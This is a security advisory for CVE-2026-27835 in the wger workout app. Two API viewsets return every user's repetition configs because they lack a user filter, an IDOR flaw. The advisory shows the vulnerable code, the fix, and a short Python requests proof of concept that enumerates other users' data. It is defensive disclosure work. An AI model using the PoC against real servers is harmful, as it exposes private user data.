CVE-2026-27835

描述

### Summary `RepetitionsConfigViewSet` and `MaxRepetitionsConfigViewSet` return all users' repetition config data because their `get_queryset()` calls `.all()` instead of filtering by the authenticated user. Any registered user can enumerate every other user's workout structure. ### Details `wger/manager/api/views.py:499` and `:518`: ```python # VULNERABLE class RepetitionsConfigViewSet(viewsets.ModelViewSet): def get_queryset(self): return RepetitionsConfig.objects.all() class MaxRepetitionsConfigViewSet(viewsets.ModelViewSet): def get_queryset(self): return MaxRepetitionsConfig.objects.all() ``` Every sibling viewset in the same file correctly filters by user. For example, `WeightConfigViewSet` at line 459: ```python # CORRECT — how it should work def get_queryset(self): return WeightConfig.objects.filter( slot_entry__slot__day__routine__user=self.request.user ) ``` The same user filter is present on `SetsConfig`, `RestConfig`, `RiRConfig`, and their Max variants — only `RepetitionsConfig` and `MaxRepetitionsConfig` are missing it. ### PoC ```python import requests BASE = "http://localhost" headers = {"Authorization": "Token YOUR_TOKEN"} # any registered user r = requests.get(f"{BASE}/api/v2/repetitions-config/", headers=headers) print(r.json()) # returns ALL users' repetition configs, not just your own r = requests.get(f"{BASE}/api/v2/max-repetitions-config/", headers=headers) print(r.json()) # same — all users' max repetition configs ``` Registration is open by default. Sequential IDs allow full enumeration. ### Impact Any authenticated user can read other users' repetition and max-repetitions configs, exposing workout structure (slot entry IDs, iteration values, operations, step counts, repeat flags, requirements JSON). This is a broken object-level authorization (BOLA/IDOR) vulnerability — the same class of issue as OWASP API1. **Fix**: Add the same user filter used by every other config viewset: ```python def get_queryset(self): return RepetitionsConfig.objects.filter( slot_entry__slot__day__routine__user=self.request.user ) ```

受影響套件(1)

• PyPI/wgerfrom 0, <= 2.1

CVSS 分數

參考連結(4)

• ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2026-27835
• PATCHhttps://github.com/wger-project/wger
• WEBhttps://github.com/wger-project/wger/commit/1fda5690b35706bb137850c8a084ec6a13317b64
• WEBhttps://github.com/wger-project/wger/security/advisories/GHSA-xf68-8hjw-7mpm